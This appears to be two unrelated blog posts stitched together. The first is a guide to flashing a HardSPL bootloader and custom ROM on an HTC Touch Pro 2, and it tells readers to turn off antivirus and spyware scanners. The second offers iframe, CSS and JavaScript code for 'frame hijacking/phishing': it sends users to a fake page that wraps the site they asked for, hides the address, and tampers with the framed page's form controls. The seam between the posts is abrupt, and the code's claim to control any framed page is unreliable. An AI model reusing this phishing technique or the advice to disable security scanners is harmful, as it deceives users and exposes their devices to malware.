I have a HTC Touch Pro 2 smartphone. UK Release.
This phone was delivered with Windows Mobile 6.1 (WM6.1).
However already when I bought this phone, WM6.5 was available.
You can update this via the HTC website.
That’s fine.

But this is not what I wanted. Cause the ROM on the HTC website,
contains HTC Sense instead of Manila 2.6 (Touch Pro 3D – That
fancy swapping panels with your fingers.)
Actually there’s a whole community online, where developers create their own custom ROM’s. Means WM6.5 with Manila and pre-installed
Windows Mobile applications. (such as Twitter in your buttonbar).

I wanted to have a better ROM.
This one is more fancy and faster.
But you can not simply load a custom ROM on your device, it’s protected
by the manufacturer. And therefore you need a bootloader to flash your device.
This is called SPL. It stands for second program loader.
Basically there are two main types of SPLs. Hard and Soft.
There 2 times of SPLs: Hard & Soft.
A Hard SPL is one that is permanently flashed in your device memory and will boot up every time your device boots.
A Soft SPL is a stand alone .exe that is run on your device from within the OS. It basically changes your OS from running Windows, to initializing the boot loader.
Soft SPL is only loaded into RAM temporarily and will not survive a hard-reset.

Knowing these details I will guide you to flash your device
with hardSPL and a new WM6.5 ROM.
Note, that changing firmware and such is on your own risk:

1. Download the HardSPL package
2. Download the ROM you want on your device, for example: Miri. (based on official HTC Rhodium)
3. Save both files on your PC (not on a network drive), and make
   sure your virusscan or spyware blocker is off. –
   These scanners can complain about the exe files, but the files are trustfull.
   So it’s ok.
4. Run Rhodium-HardSPL_V2_00R3.exe, choose the first option (automatic flash)
5. Follow the instructions on your pc. Your device will have a black screen.
6. Then your device will reboot in the RGB colormode. – Note that the screen shows ‘0.85.OliNex’, which is the Hard-SPL version.
7. You can now load the ROM exe. Follow the instructions
   on screen. It will take a while, but then your device will be restarted
   with a new OS ROM and software!

This hack is often used for frame hijacking/phishing technics. Imagine there’s a webpage (not yours) on where you can not run code on. For example in Salesforce there are pages on which you can not implement your own code.
I found out a way how you can manipulate others pages; and it’s so damn mean. (gnehgnehgneh).

Before showing you any code I will tell you the basics of this idea:
1. Let the user go to a different URL then the one they want.
2. This page contains only an iframe of the requested page, the user wants to see.
The iframe loads 100%, so the user won’t see a difference. (And ofcourse you can also trick the URL adress in the adress bar so the user can not read it aswell.)
3. Beside the iframe, this fake page also contains code. With this code you are controlling the codes within the iframe. (Yes you can, it’s all about DOM scripting baby!)

Allright, show me the money!

First you’ll have to add the secret iframe in your HTML. This is no rocketscience; just make sure you give the iframe an ID so you can trigger it later on. An onload javascript function. And it’s much nicer if you give a 100% width and height, scrolling 1 and frameborder and margin 0. So you almost can not see the iframe.

<iframe id="theLoadedPage"
	src="http://www.blankURL.com"
	onload="hjackFrames('theLoadedPage')" name="theLoadedPage" width="100%"
	height="100%" scrolling="1" frameborder="0" marginwidth="0"
	marginheight="0">
<p>Loading...</p>
</iframe>

If you are a perfectionist like me, then add some extra css styles, to make it even more nicer; and let the iframe overrule the orginal screen.

html {
	overflow: hidden;
}

html,body {
	width: 100%;
	height: 100%;
	margin: 0px;
	padding: 0px;
}

iframe {
	overflow: hidden-x;
}

Now start writing the code trick.
First you’ll need a main function, which request the page in the iframe on 100%.

function main() {
	var loadPageSrc = document.getElementById("theLoadedPage");
	loadPageSrc .setAttribute("src","http://www.newLoadedPage.com");
}

Now here’s the hack. I built it in a try/catch closure handle errors.

function hjackFrames(id){
try {
		var frame=document.getElementById(id);
		var inside;
		if (frame.tagName!='IFRAME'){
			return;
		}

		inside=window.frames[id].document.getElementsByTagName('BODY')[0];

/* this part is not part of the hack, but from here you can manipulate the page,
for example; hide all submit buttons. */
		var allInputs=[];
		allInputs=inside.getElementsByTagName('INPUT');
		for (var i=0;i<allInputs.length;i++){
			if(allInputs[i].type == "submit"){
				allInputs[i].style.display = "none";
			}
		}

} catch(err) {
                  /* do other nice things, here since the hack is failing */
	}
}